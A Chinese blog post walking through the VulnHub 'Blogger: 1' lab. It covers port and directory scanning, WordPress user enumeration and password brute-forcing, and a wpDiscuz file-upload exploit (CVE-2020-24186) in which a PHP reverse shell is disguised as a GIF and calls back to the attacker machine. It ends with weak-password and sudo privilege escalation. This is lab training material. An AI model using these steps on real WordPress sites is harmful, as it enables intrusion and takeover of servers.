vulnhub blogger: 1

最新推荐文章于 2023-04-13 13:15:04 发布
最新推荐文章于 2023-04-13 13:15:04 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: vulnhub 文章标签: wpscan wordpress wpdiscuz CVE-2020-24186
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/127036945
版权

渗透思路:

nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan发现wordpress漏洞插件 ---- 利用插件wpdiscuz的未授权的任意文件上传漏洞(CVE-2020-24186)getshell ---- 弱密码提权

环境信息:

靶机:192.168.101.106

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.106

扫描到22和80端口

2、gobuster扫描网站目录

gobuster dir -u http://192.168.101.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

只扫描到下图几个目录,一个个看过去,发现/assets目录内有乾坤

http://192.168.101.106/assets/fonts/下有个目录叫blog,点了之后来到http://192.168.101.106/assets/fonts/blog/

观察http://192.168.101.106/assets/fonts/blog/发现应该是个wordpress站点

3、wpscan发现wordpress漏洞插件

wpscan枚举wordpress用户名

wpscan --url http://192.168.101.106/assets/fonts/blog/ -e

发现用户jm3s

然后爆破jm3s的密码,但是没有爆破出来

wpscan --url http://192.168.101.106/assets/fonts/blog/ -U jm3s-P "rockyou.txt"

接下来尝试用wpscan枚举wordpress插件,可以选mixed模式或者aggressive模式

wpscan --url http://192.168.101.106/assets/fonts/blog/ --plugins-detection mixed

发现两个插件,其中wpdiscuz有未授权的任意文件上传漏洞,可以getshell

4、利用插件wpdiscuz的未授权的任意文件上传漏洞(CVE-2020-24186)getshell

在利用任意文件上传之前,需要让网页正常显示,从网页源代码中可以推断,网站的hostname应该是

blogger.thm

修改攻击机的/etc/hosts,增加一行192.168.101.106 blogger.thm

下面这篇文章是该漏洞的复现(CVE-2020-24186),照着做一遍就可以getshell

https://www.jianshu.com/p/6f178aec2749

先随便点一个文章,比如第一篇http://blogger.thm/assets/fonts/blog/?p=29

拉到文章最下面,在提交评论的右下角有个图像的图标,点击这个图标

将kali中/usr/share/webshells/php/php-reverse-shell.php重命名为shell.gif,并在文件内容的最前面加上"GIF89a"(不好意思图片里面写错了,不过居然过了验证^-^),然后将$ip和$port改为攻击机ip和监听端口。保存后在此处上传。

上传过程中用burp抓包,将请求报文中filename改为shell.php

响应报文中可以看到shell.php的存储路径http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/shell-1663674140.4664.php

攻击机上nc监听8888端口

nc -nlvp 8888

浏览器访问

http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/shell-1663674140.4664.php

在攻击机监听端口上得到www-data的shell

执行下面的代码可以得到交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

5、弱密码提权

进入靶机/home目录发现有三个用户,经过尝试发现vagrant用户的密码和用户名相同,用su - vagrant命令提权到vagrant。

提权到vagrant后,执行sudo -l,发现vagrant可以以任何用户的身份执行任何命令,因此可以用sudo su -命令提权到root

两个flag文件分别是/home/james/user.txt和/root/root.txt,内容都是base64编码的,可以用cat xxx | base64 -d命令解码

cat /home/james/user.txt | base64 -d

cat /root/root.txt | base64 -d

仙女象
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 938
【靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
Blogger:男人JS
05-30
1. **Ember.js 框架**:Ember.js 是一款流行的前端框架,基于MVVM(Model-View-ViewModel)模式,提供双向数据绑定、路由管理、组件化和自动化数据管理等特性,旨在简化大型应用的开发流程。它有一套完整的最佳实践...
vulnhub BLOGGER: 1 WP
最新发布
qq_37410729的博客
04-13 151
然后查看一下/etc/passwd 发现可能有james,ubuntu,vagrant这些用户,也没翻到与密码有关的信息,索性就用用户名做密码试试,竟然登录成功了vagrant。然后就可以在kali中用arp扫到靶机了,得到IP地址,然后进行端口扫描,又是开启了22和80,然后去web进行信息收集。只需要有个图片头就可以绕过力,上传shell,shell地址也会回显,然后蚁剑成功连接。扫到一些目录,点进去挨个翻一翻,最终翻到一个留言系统。大部分按钮都不好使,注册也不好用,扫一下目录。
VulnHub渗透实战--Billu_b0x
crispr的博客
02-05 959
Billu_b0x 0X01 Main Point 1.简单的代码审计 2. 文件包含漏洞(LFI) 读取源码 3. 文件上传得到webshell 4. Linux内核提权(Ubuntu 12.04) 5. SQLI 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP nmap -sV -A -p- 172.20.10.3 #探测靶机端口及系统情况 常规的开放...
Python程序之使用Scapy进行ARP局域网主机扫描
青柚的博客
06-14 2982
关于Scapy模块的详细介绍我就不在这里赘述了,附上一个连接以供了解。 Scapy模块介绍:https://scapy.readthedocs.io/en/latest/ Scapy模块使用: Scapy模块属于第三方库,在Windows上需要输入pip install scapy进行安装。 如果Windows下安装scapy需要安装winpcap或npcap 注:安装过Wiresha...
Error validating server certificate for https://192.168.101.106:443:
热门推荐
无意摘花
11-21 2万+
Error validating server certificate for https://192.168.101.106:443: - Unknown certificate issuer Fingerprint: 54:4e:01:92:66:28:ff:c7:2d:69:86:92:c1:91:15:fe:7a:2e:cf:42 Distinguished name:
blogger:MERN Stack中型博客网站
05-09
博客应用 可用脚本 在项目目录中,可以运行: npm install 安装所有依赖项 npm start 仅打开前端客户端模式 npm run dev 打开网站(后端+前端打开) 后端路由: @Route: GET / api / user / dashboard @Desc:...
material-blogger:Google Blogger的Material Design模板
02-05
1. **Sass(Syntactically Awesome Style Sheets)**: Sass是一种预处理器语言,扩展了CSS的功能,如变量、嵌套规则、混合、函数等,使CSS更易于维护和扩展。在material-blogger模板中,Sass被用来编写更加结构化...
minimalist_blogger:极简博客
04-28
1. **头部(Head)**:包含元数据,如字符集设置(`<meta charset="UTF-8">`)、页面标题(`<title>`)以及可能的样式表链接(`<link rel="stylesheet" href="...">`)。 2. **主体(Body)**:存放博客的实际内容...
blogger:经济和商业新闻网站
05-23
1. **前端框架**:由于JavaScript标签的出现,很可能采用了React、Angular或Vue.js等现代前端框架来构建用户界面,这些框架能有效提高开发效率并提供丰富的组件库。 2. **响应式设计**:考虑到博客网站需要适应不同...
靶机实战-blogger
ST0new的博客
04-05 3919
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。
OpenSSH 命令注入漏洞(CVE-2020-15778)复现
05-20 323
OpenSSH 命令注入漏洞(CVE-2020-15778)复现 创建一个测试文件,然后对服务器传文件 成功上传文件
CVE-2020-16898: Windows TCP/IP远程执行代码漏洞通告
爱国小白帽
10-14 6678
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-101402 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-14 0x01 漏洞简述 2020年10月14日,360CERT监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞 的风险通告,该漏洞编号为CVE-2020-16875,漏洞等级:严重,漏洞评分:9.8。 远程攻击者通过构造特制的ICMPv6 Router Advertisemen
OpenSSH命令注入漏洞(CVE-2020-15778)
weixin_41182861的博客
09-25 5093
漏洞简述 OpenSSH是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效防止窃听、连接劫持以及其他攻击。 实际环境汇中的利用场景: 对于用户来说,ssh被阻止,但在authorized_keys文件中的命令选项允许使用scp的情况下,可以绕过此限制并在远程服务器上执行命令。也就是说,实际中通过各种手段获取到ssh的用户密码,但是不允许ssh连接,或者IP连接受限等情况下,可以尝试此漏洞进行利用。 涉及版本:OpenS
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7362
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
2021-10-03
qq_42815324的博客
10-03 1902
VulnHub靶机系列之Blogger 提示:此靶机可以去VulnHub官网下载供自己学习研究 官网:http://www.vulnhub.com/about/ 提示:此文章纯属个人学习记录文章,请勿用于恶意攻击 文章目录VulnHub靶机系列之Blogger前言一、信息收集阶段二、漏洞利用1.漏洞点2.获取flag总结 前言 靶机考点: 此靶机针对的知识点就是wordpress以及wordpress插件,需要学习者去仔细搜索插件信息和学习wordpress渗透相关的技术 提示:以下是本篇文章正文内
搭建基于Eclipse的Jboss开发环境
黑土的博客
07-09 1628
Running JBoss in Eclipse on a Developers WorkstationAudiencePurposePrerequisitesRunning JBoss in Eclipse, allowing localhost-access onlyRunning a generated server fr
ubuntu svn 出现Error validating server certificate for 'https://192.168.1.103:8443'
wangfeitaozhijia的专栏
05-13 4484
Error validating server certificate for 'https://192.168.1.103:8443':  - The certificate is not issued by a trusted authority. Use the    fingerprint to validate the certificate manually!  - The ce
Vulnhub靶机实战-Lampiao
黑白的博客
01-10 574
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.12 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,1898 访问80 http://192.168.239.12 80开了个寂寞 dirscan连接还有问题 看看18
精通AngularJS:新手到专家
1. Falling In Love With AngularJS:介绍AngularJS的基本理念和优势,帮助读者建立对框架的初步理解。 2. Modules, Controllers & Data Binding:讲解AngularJS中的模块系统,控制器如何用于管理应用状态,以及...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值